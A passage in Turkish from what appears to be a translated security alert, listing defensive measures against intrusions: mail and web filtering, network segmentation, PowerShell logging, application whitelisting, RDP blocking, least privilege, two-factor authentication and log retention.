  • Web ve Email filtrelerini ağ üzerinde uygulayın, bilinen zararlı etki adı alanlarını, kaynakları ve adresleri taramak için bu aygıtları yapılandırın; mesajları almadan ve indirmeden önce bunları engelleyin.
  • Kritik ağları ve kontrol sistemlerini iş sistemlerinden bölümlerine göre ayırın.
  • Giriş ve çıkış noktalarında yeterli günlük kaydı ve görünürlüğü sağlayın.
  • Olay günlük kayıtlarını etkinleştirmiş olarak PowerShell sürüm 5’i kullanılmasını sağlayın. PowerShell’in eski sürümleri bir saldırganın yürüttüğü PowerShell komutlarının yeterli günlüğe kaydedilmesini sağlamaz. PowerShell günlüğü ve komut dosyası blogu kopyalama işlevini etkinleştirip bunların analiz için bir merkezi havuza gönderin.
  • NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.
    Tehlikeli web sunucuları ve web shell tehdit bilinci ve klavuzunda özetlenen önleme, tespit ve azaltma stratejilerini uygulayın.
  • Son kullanıcıları uygun email ve web kullanımı hakkında bilgilendirmek, mevcut bilgileri ve analizleri vurgulamak ve kimlik avı ortak göstergelerini eklemek için bir eğitim mekanizması oluşturun. Son kullanıcılar, olağandışı veya şüpheli e-postaların nasıl raporlanacağı hakkında açık talimalatlara sahip olmalıdır.
  • Sistem yöneticileri Microsoft yazılım kısıtlama ilkesi, AppLocker veya benzeri bir yazılım aracılığıyla uygulama veya uygulama dizini beyaz liste için uygulayabilir. Güvenli varsayılanlar programların ProgramFiles ve ProgramFiles(x86) SYSTEM32 ve tüm ICS yazılım klasörlerinden çalışmasına izin verir, istisna verilmezse tüm diğer yerler yasaklanmalıdır.
  • İstisna olmadıkça güvenilir olmayan dış adreslerden gelen RDP bağlantılarını engelleyin.
  • Görev kritik sistemlerin sistem günlüğünü en az bir yıl boyunca güvenlik bilgi olay yönetimi aracında saklayın.
  • Uygulamaların bir olay yanıt soruşturması için uygun ayrıntı düzeyini girilecek şekilde yapılandırıldığından emin olun.
  • Yetkisiz kod çalıştırma için HIPS veya diğer denetimleri uygulayın.
  • En az ayrıcalık denetimi uygulayın.
  • Active Directory etki alanı ve kuruluş yöneticisi hesaplarının sayısını azaltın.
  • Şüphe duyulan seviyeye göre tüm kullanıcı, yönetici kimlik bilgilerini tüm yerel ve domain sistemleri içinde sıfırlayın.
  • Tüm kullanıcılar için karmaşık parola politikası oluşturun.
  • Yönetici hesaplarının harici bir bağlantısı olmadığından emin olun.
  • Yöneticilerin email ve İnternet erişimi için ayrıcalıksız hesaplar kullandıklarından emin olun.
  • Bütün girişler için two-factor authentication kullanın.
  • Ayrıcalıklı hesaplar tarafından gerçekleştirilen faaliyetleri günlüğe kaydedip denetleyin.
  • Yetki yükseltmesi için loglamayı ve uyarı vermeyi etkinleştirin.
  • Hassas bilgilerin dışarı çıkmış olmadığından emin olmak için kamuya açık bilgilerin aranmasını sağlayın. Dışarıya çıkarılmış olabilecek veriler için fotoğrafları ve belgeleri inceleyin.
  • Uyarıları, olay günlüklerini incelemek için yeterli personel olduğundan emin olun.
  • Bağımsız bir güvenlik risk denetimi gerçekleştirin.
  • Bilgi paylaşım platformları oluşturun ve katılın.
  • Olaylara zamanında müdahale etmek için ağ ve sistem dokümantasyonu oluşturun ve gerekli düzenlemeleri yapın. Belgeler şebeke diyagramlarını, varlık sahiplerini, varlık türünü ve olay tepki planını içermelidir.